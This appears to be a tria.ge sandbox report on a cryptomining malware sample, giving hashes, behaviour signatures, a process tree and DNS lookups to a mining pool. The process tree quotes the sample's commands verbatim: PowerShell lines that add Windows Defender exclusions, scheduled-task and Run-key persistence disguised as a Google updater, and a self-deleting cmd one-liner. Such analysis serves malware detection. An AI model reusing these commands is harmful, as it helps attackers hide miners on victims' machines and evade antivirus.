Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Overview
overview
10Static
static
3QNREJhVYDhHk52cq3.exe
windows7-x64
10QNREJhVYDhHk52cq3.exe
windows10-2004-x64
10RmJBfzgfbWELMdgn.exe
windows7-x64
10RmJBfzgfbWELMdgn.exe
windows10-2004-x64
10TTVw7dDmSpz5mwee.exe
windows7-x64
10TTVw7dDmSpz5mwee.exe
windows10-2004-x64
10qM5GMXBk6h...6).exe
windows7-x64
10qM5GMXBk6h...6).exe
windows10-2004-x64
10qM5GMXBk6h...9).exe
windows7-x64
10qM5GMXBk6h...9).exe
windows10-2004-x64
10qM5GMXBk6h...4).exe
windows7-x64
10qM5GMXBk6h...4).exe
windows10-2004-x64
10qM5GMXBk6h...3).exe
windows7-x64
10qM5GMXBk6h...3).exe
windows10-2004-x64
10qM5GMXBk6h...4).exe
windows7-x64
10qM5GMXBk6h...4).exe
windows10-2004-x64
10qM5GMXBk6h...5).exe
windows7-x64
10qM5GMXBk6h...5).exe
windows10-2004-x64
10qM5GMXBk6h...7).exe
windows7-x64
10qM5GMXBk6h...7).exe
windows10-2004-x64
10qM5GMXBk6h...8).exe
windows7-x64
10qM5GMXBk6h...8).exe
windows10-2004-x64
10qM5GMXBk6h...6).exe
windows7-x64
10qM5GMXBk6h...6).exe
windows10-2004-x64
10Resubmissions
16/01/2024, 20:08 UTC
240116-yw2hnahhck 1024/12/2023, 12:16 UTC
231224-pfpz9abhcp 1028/08/2023, 15:19 UTC
230828-sqmvesca87 1026/08/2023, 15:20 UTC
230826-sqz5radd21 1020/08/2023, 00:19 UTC
230820-amltvacg48 1020/08/2023, 00:19 UTC
230820-amkxjscg46 1020/08/2023, 00:18 UTC
230820-al4y2aec9v 1020/08/2023, 00:18 UTC
230820-al4m9scg45 1020/08/2023, 00:18 UTC
230820-al32qscg44 1020/08/2023, 00:18 UTC
230820-al3e7sec9t 10Analysis
-
max time kernel
344s -
max time network
1802s -
platform
windows7_x64 -
resource
win7-20230712-en -
resource tags
arch:x64arch:x86image:win7-20230712-enlocale:en-usos:windows7-x64system -
submitted
20/08/2023, 00:19 UTC
Static task
static1
Behavioral task
behavioral1
Sample
QNREJhVYDhHk52cq3.exe
Resource
win7-20230712-en
Behavioral task
behavioral2
Sample
QNREJhVYDhHk52cq3.exe
Resource
win10v2004-20230703-en
Behavioral task
behavioral3
Sample
RmJBfzgfbWELMdgn.exe
Resource
win7-20230712-en
Behavioral task
behavioral4
Sample
RmJBfzgfbWELMdgn.exe
Resource
win10v2004-20230703-en
Behavioral task
behavioral5
Sample
TTVw7dDmSpz5mwee.exe
Resource
win7-20230712-en
Behavioral task
behavioral6
Sample
TTVw7dDmSpz5mwee.exe
Resource
win10v2004-20230703-en
Behavioral task
behavioral7
Sample
qM5GMXBk6hJE6Y5e (16).exe
Resource
win7-20230712-en
Behavioral task
behavioral8
Sample
qM5GMXBk6hJE6Y5e (16).exe
Resource
win10v2004-20230703-en
Behavioral task
behavioral9
Sample
qM5GMXBk6hJE6Y5e (19).exe
Resource
win7-20230712-en
Behavioral task
behavioral10
Sample
qM5GMXBk6hJE6Y5e (19).exe
Resource
win10v2004-20230703-en
Behavioral task
behavioral11
Sample
qM5GMXBk6hJE6Y5e (4).exe
Resource
win7-20230712-en
Behavioral task
behavioral12
Sample
qM5GMXBk6hJE6Y5e (4).exe
Resource
win10v2004-20230703-en
Behavioral task
behavioral13
Sample
qM5GMXBk6hJE6Y5e(13).exe
Resource
win7-20230712-en
Behavioral task
behavioral14
Sample
qM5GMXBk6hJE6Y5e(13).exe
Resource
win10v2004-20230703-en
Behavioral task
behavioral15
Sample
qM5GMXBk6hJE6Y5e(14).exe
Resource
win7-20230712-en
Behavioral task
behavioral16
Sample
qM5GMXBk6hJE6Y5e(14).exe
Resource
win10v2004-20230703-en
Behavioral task
behavioral17
Sample
qM5GMXBk6hJE6Y5e(15).exe
Resource
win7-20230712-en
Behavioral task
behavioral18
Sample
qM5GMXBk6hJE6Y5e(15).exe
Resource
win10v2004-20230703-en
Behavioral task
behavioral19
Sample
qM5GMXBk6hJE6Y5e(17).exe
Resource
win7-20230712-en
Behavioral task
behavioral20
Sample
qM5GMXBk6hJE6Y5e(17).exe
Resource
win10v2004-20230703-en
Behavioral task
behavioral21
Sample
qM5GMXBk6hJE6Y5e(18).exe
Resource
win7-20230712-en
Behavioral task
behavioral22
Sample
qM5GMXBk6hJE6Y5e(18).exe
Resource
win10v2004-20230703-en
Behavioral task
behavioral23
Sample
qM5GMXBk6hJE6Y5e(6).exe
Resource
win7-20230712-en
General
-
Target
qM5GMXBk6hJE6Y5e(14).exe
-
Size
2.0MB
-
MD5
a16a669a09bf158058b83e04e69fe38e
-
SHA1
f6c94763850d9e590d86057139e8895a7aacdeea
-
SHA256
cacc0261ccf7578ef5c1f9fdbe35705ad91070d020a4225e05cbf71a6103ac8e
-
SHA512
658b52ad1d27becee5b5bbd443d43da38b88d49880e72c8cb843f176a2d84d571b39c34dbc7cfb7ea56acc548acc5b68cce47a8bcf9d173feec031f7e33a09c6
-
SSDEEP
49152:rWVipAxqo5p88CbXuxWQiSJU320ZW21Q0YWAij64ane6szjmL/45:rxAEcp9ueXit9WAQ0YWuO
Malware Config
Signatures
-
Suspicious use of NtCreateUserProcessOtherParentProcess 9 IoCs
description pid Process procid_target PID 2428 created 1192 2428 qM5GMXBk6hJE6Y5e(14).exe 20 PID 2428 created 1192 2428 qM5GMXBk6hJE6Y5e(14).exe 20 PID 2428 created 1192 2428 qM5GMXBk6hJE6Y5e(14).exe 20 PID 2428 created 1192 2428 qM5GMXBk6hJE6Y5e(14).exe 20 PID 2608 created 1192 2608 updater.exe 20 PID 2608 created 1192 2608 updater.exe 20 PID 2608 created 1192 2608 updater.exe 20 PID 1720 created 1192 1720 conhost.exe 20 PID 2608 created 1192 2608 updater.exe 20 -
XMRig Miner payload 30 IoCs
resource yara_rule behavioral15/memory/1752-125-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral15/memory/1752-126-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral15/memory/1752-130-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral15/memory/1752-132-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral15/memory/1752-134-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral15/memory/1752-136-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral15/memory/1752-138-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral15/memory/1752-140-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral15/memory/1752-142-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral15/memory/1752-144-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral15/memory/1752-146-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral15/memory/1752-148-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral15/memory/1752-150-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral15/memory/1752-152-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral15/memory/1752-154-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral15/memory/1752-156-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral15/memory/1752-158-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral15/memory/1752-160-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral15/memory/1752-162-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral15/memory/1752-164-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral15/memory/1752-171-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral15/memory/1752-173-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral15/memory/1752-175-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral15/memory/1752-177-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral15/memory/1752-179-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral15/memory/1752-181-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral15/memory/1752-183-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral15/memory/1752-185-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral15/memory/1752-187-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral15/memory/1752-189-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig -
Deletes itself 1 IoCs
pid Process 2108 cmd.exe -
Executes dropped EXE 1 IoCs
pid Process 2608 updater.exe -
Loads dropped DLL 1 IoCs
pid Process 2308 taskeng.exe -
resource yara_rule behavioral15/memory/1752-119-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral15/memory/1752-125-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral15/memory/1752-126-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral15/memory/1752-130-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral15/memory/1752-132-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral15/memory/1752-134-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral15/memory/1752-136-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral15/memory/1752-138-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral15/memory/1752-140-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral15/memory/1752-142-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral15/memory/1752-144-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral15/memory/1752-146-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral15/memory/1752-148-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral15/memory/1752-150-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral15/memory/1752-152-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral15/memory/1752-154-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral15/memory/1752-156-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral15/memory/1752-158-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral15/memory/1752-160-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral15/memory/1752-162-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral15/memory/1752-164-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral15/memory/1752-171-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral15/memory/1752-173-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral15/memory/1752-175-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral15/memory/1752-177-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral15/memory/1752-179-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral15/memory/1752-181-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral15/memory/1752-183-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral15/memory/1752-185-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral15/memory/1752-187-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral15/memory/1752-189-0x0000000140000000-0x00000001407F4000-memory.dmp upx -
Drops file in System32 directory 5 IoCs
description ioc Process File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe -
Suspicious use of SetThreadContext 2 IoCs
description pid Process procid_target PID 2608 set thread context of 1720 2608 updater.exe 48 PID 2608 set thread context of 1752 2608 updater.exe 55 -
Drops file in Program Files directory 4 IoCs
description ioc Process File created C:\Program Files\Google\Chrome\updater.exe qM5GMXBk6hJE6Y5e(14).exe File created C:\Program Files\Google\Libs\WR64.sys updater.exe File created C:\Program Files\Google\Libs\g.log cmd.exe File created C:\Program Files\Google\Libs\g.log cmd.exe -
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 1676 schtasks.exe 2924 schtasks.exe -
Detects videocard installed 1 TTPs 1 IoCs
Uses WMIC.exe to determine videocard installed.
pid Process 3060 WMIC.exe -
Modifies data under HKEY_USERS 3 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage powershell.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = 6052f6120ed3d901 powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ WMIC.exe -
Suspicious behavior: EnumeratesProcesses 25 IoCs
pid Process 2428 qM5GMXBk6hJE6Y5e(14).exe 2428 qM5GMXBk6hJE6Y5e(14).exe 1328 powershell.exe 2428 qM5GMXBk6hJE6Y5e(14).exe 2428 qM5GMXBk6hJE6Y5e(14).exe 2820 powershell.exe 2428 qM5GMXBk6hJE6Y5e(14).exe 2428 qM5GMXBk6hJE6Y5e(14).exe 2428 qM5GMXBk6hJE6Y5e(14).exe 2428 qM5GMXBk6hJE6Y5e(14).exe 2880 powershell.exe 2608 updater.exe 2608 updater.exe 824 powershell.exe 2608 updater.exe 2608 updater.exe 2624 powershell.exe 2608 updater.exe 2608 updater.exe 2608 updater.exe 2608 updater.exe 1720 conhost.exe 1720 conhost.exe 2608 updater.exe 2608 updater.exe -
Suspicious behavior: LoadsDriver 1 IoCs
pid Process 468 Process not Found -
Suspicious use of AdjustPrivilegeToken 31 IoCs
description pid Process Token: SeDebugPrivilege 1328 powershell.exe Token: SeDebugPrivilege 2820 powershell.exe Token: SeDebugPrivilege 2880 powershell.exe Token: SeDebugPrivilege 824 powershell.exe Token: SeDebugPrivilege 2624 powershell.exe Token: SeDebugPrivilege 2608 updater.exe Token: SeAssignPrimaryTokenPrivilege 3060 WMIC.exe Token: SeIncreaseQuotaPrivilege 3060 WMIC.exe Token: SeSecurityPrivilege 3060 WMIC.exe Token: SeTakeOwnershipPrivilege 3060 WMIC.exe Token: SeLoadDriverPrivilege 3060 WMIC.exe Token: SeSystemtimePrivilege 3060 WMIC.exe Token: SeBackupPrivilege 3060 WMIC.exe Token: SeRestorePrivilege 3060 WMIC.exe Token: SeShutdownPrivilege 3060 WMIC.exe Token: SeSystemEnvironmentPrivilege 3060 WMIC.exe Token: SeUndockPrivilege 3060 WMIC.exe Token: SeManageVolumePrivilege 3060 WMIC.exe Token: SeAssignPrimaryTokenPrivilege 3060 WMIC.exe Token: SeIncreaseQuotaPrivilege 3060 WMIC.exe Token: SeSecurityPrivilege 3060 WMIC.exe Token: SeTakeOwnershipPrivilege 3060 WMIC.exe Token: SeLoadDriverPrivilege 3060 WMIC.exe Token: SeSystemtimePrivilege 3060 WMIC.exe Token: SeBackupPrivilege 3060 WMIC.exe Token: SeRestorePrivilege 3060 WMIC.exe Token: SeShutdownPrivilege 3060 WMIC.exe Token: SeSystemEnvironmentPrivilege 3060 WMIC.exe Token: SeUndockPrivilege 3060 WMIC.exe Token: SeManageVolumePrivilege 3060 WMIC.exe Token: SeLockMemoryPrivilege 1752 conhost.exe -
Suspicious use of WriteProcessMemory 20 IoCs
description pid Process procid_target PID 2820 wrote to memory of 2924 2820 powershell.exe 32 PID 2820 wrote to memory of 2924 2820 powershell.exe 32 PID 2820 wrote to memory of 2924 2820 powershell.exe 32 PID 2108 wrote to memory of 2760 2108 cmd.exe 37 PID 2108 wrote to memory of 2760 2108 cmd.exe 37 PID 2108 wrote to memory of 2760 2108 cmd.exe 37 PID 2880 wrote to memory of 2832 2880 powershell.exe 38 PID 2880 wrote to memory of 2832 2880 powershell.exe 38 PID 2880 wrote to memory of 2832 2880 powershell.exe 38 PID 2308 wrote to memory of 2608 2308 taskeng.exe 40 PID 2308 wrote to memory of 2608 2308 taskeng.exe 40 PID 2308 wrote to memory of 2608 2308 taskeng.exe 40 PID 2624 wrote to memory of 1676 2624 powershell.exe 47 PID 2624 wrote to memory of 1676 2624 powershell.exe 47 PID 2624 wrote to memory of 1676 2624 powershell.exe 47 PID 2608 wrote to memory of 1720 2608 updater.exe 48 PID 2900 wrote to memory of 3060 2900 cmd.exe 53 PID 2900 wrote to memory of 3060 2900 cmd.exe 53 PID 2900 wrote to memory of 3060 2900 cmd.exe 53 PID 2608 wrote to memory of 1752 2608 updater.exe 55
Processes
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵PID:1192
-
C:\Users\Admin\AppData\Local\Temp\qM5GMXBk6hJE6Y5e(14).exe"C:\Users\Admin\AppData\Local\Temp\qM5GMXBk6hJE6Y5e(14).exe"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
PID:2428
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1328
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#wokgfo#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2820 -
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn GoogleUpdateTaskMachineQC /tr "'C:\Program Files\Google\Chrome\updater.exe'"3⤵
- Creates scheduled task(s)
PID:2924
-
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\qM5GMXBk6hJE6Y5e(14).exe"2⤵
- Deletes itself
- Suspicious use of WriteProcessMemory
PID:2108 -
C:\Windows\System32\choice.exechoice /C Y /N /D Y /T 33⤵PID:2760
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#glbtb#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "GoogleUpdateTaskMachineQC" } Else { "C:\Program Files\Google\Chrome\updater.exe" }2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2880 -
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /run /tn GoogleUpdateTaskMachineQC3⤵PID:2832
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:824
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#wokgfo#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2624 -
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn GoogleUpdateTaskMachineQC /tr "'C:\Program Files\Google\Chrome\updater.exe'"3⤵
- Creates scheduled task(s)
PID:1676
-
-
-
C:\Windows\System32\conhost.exeC:\Windows\System32\conhost.exe qtdiqnkejoz2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Suspicious behavior: EnumeratesProcesses
PID:1720
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"2⤵
- Drops file in Program Files directory
PID:2920
-
-
C:\Windows\System32\conhost.exeC:\Windows\System32\conhost.exe coygkprqxpklmnvz 6E3sjfZq2rJQaxvLPmXgsF7vH8nKLC0ur3jCwye3fPooFst8AJlNjZc1TvSyIQTKz3bkbADxizSwgp6IHJKg4enmph7iNmIeAYcJJRGkawcinVbrMdr45fHmW9ZqCrw3dSLKVMKzrI2u4sgGlTj0G1RmIYUpqYq+tIjGyNap0si+Bl1xh/1o3aGmtmdST7PlUgkYz6ci8qWCk/Icfx3DrSi2oQaBV3Dr68Ysn/4ifK09AI9K4Wz/J2kKABX44SMSz/klz2Q+FtxUOLuLpB0ApMJVvTxUIOnUHLATPgLq86uJLXtnMRoz90CklrR3X6ggj+Qodet1aWyPnFIog0clkH9Lt1wIn/XNs6NZ/3bJg2NyJ2xuvDRy+oOBgUebKWiz2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1752
-
-
C:\Windows\system32\taskeng.exetaskeng.exe {D63575FF-700A-40E3-BCAA-EFE9E27B292A} S-1-5-18:NT AUTHORITY\System:Service:1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2308 -
C:\Program Files\Google\Chrome\updater.exe"C:\Program Files\Google\Chrome\updater.exe"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2608 -
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"3⤵
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
PID:2900 -
C:\Windows\System32\Wbem\WMIC.exewmic PATH Win32_VideoController GET Name, VideoProcessor4⤵
- Detects videocard installed
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:3060
-
-
-
Network
-
Remote address:8.8.8.8:53Requestpool.hashvault.proIN AResponsepool.hashvault.proIN A45.76.89.70pool.hashvault.proIN A95.179.241.203
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2.0MB
MD5a16a669a09bf158058b83e04e69fe38e
SHA1f6c94763850d9e590d86057139e8895a7aacdeea
SHA256cacc0261ccf7578ef5c1f9fdbe35705ad91070d020a4225e05cbf71a6103ac8e
SHA512658b52ad1d27becee5b5bbd443d43da38b88d49880e72c8cb843f176a2d84d571b39c34dbc7cfb7ea56acc548acc5b68cce47a8bcf9d173feec031f7e33a09c6
-
Filesize
2.0MB
MD5a16a669a09bf158058b83e04e69fe38e
SHA1f6c94763850d9e590d86057139e8895a7aacdeea
SHA256cacc0261ccf7578ef5c1f9fdbe35705ad91070d020a4225e05cbf71a6103ac8e
SHA512658b52ad1d27becee5b5bbd443d43da38b88d49880e72c8cb843f176a2d84d571b39c34dbc7cfb7ea56acc548acc5b68cce47a8bcf9d173feec031f7e33a09c6
-
Filesize
198B
MD537dd19b2be4fa7635ad6a2f3238c4af1
SHA1e5b2c034636b434faee84e82e3bce3a3d3561943
SHA2568066872eea036f3ff59d58ff82ea1d5a8248ebc3c2b6161a17fe5c48441edc07
SHA51286e8550412f282e18ef0c6417ee94e9c141433913452efffb738d92f040e20ecc5e2250e9e2ac1f94c248eab83a601cba5b006e982a4aefe9dcb88e9c53c67e5
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD58f1ad15c202206749838a533a6f71ec6
SHA1b9bb1f00c679019020c7c2f357a6cfb957257b00
SHA256b397306b987843b22816f0c8422a64bdc78b75c6db7522376cc59984fc54d137
SHA5129836254984b7bdfd2640fc5f84f7d50e70d892a844544f8754b529dd3fccdef70483b9f50d4e532c1c54a71da76063575dce484b748c1903486b83c5c1878cda
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD58f1ad15c202206749838a533a6f71ec6
SHA1b9bb1f00c679019020c7c2f357a6cfb957257b00
SHA256b397306b987843b22816f0c8422a64bdc78b75c6db7522376cc59984fc54d137
SHA5129836254984b7bdfd2640fc5f84f7d50e70d892a844544f8754b529dd3fccdef70483b9f50d4e532c1c54a71da76063575dce484b748c1903486b83c5c1878cda
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\8ZJPU51XREFYZO87VWMO.temp
Filesize7KB
MD58f1ad15c202206749838a533a6f71ec6
SHA1b9bb1f00c679019020c7c2f357a6cfb957257b00
SHA256b397306b987843b22816f0c8422a64bdc78b75c6db7522376cc59984fc54d137
SHA5129836254984b7bdfd2640fc5f84f7d50e70d892a844544f8754b529dd3fccdef70483b9f50d4e532c1c54a71da76063575dce484b748c1903486b83c5c1878cda
-
Filesize
2.0MB
MD5a16a669a09bf158058b83e04e69fe38e
SHA1f6c94763850d9e590d86057139e8895a7aacdeea
SHA256cacc0261ccf7578ef5c1f9fdbe35705ad91070d020a4225e05cbf71a6103ac8e
SHA512658b52ad1d27becee5b5bbd443d43da38b88d49880e72c8cb843f176a2d84d571b39c34dbc7cfb7ea56acc548acc5b68cce47a8bcf9d173feec031f7e33a09c6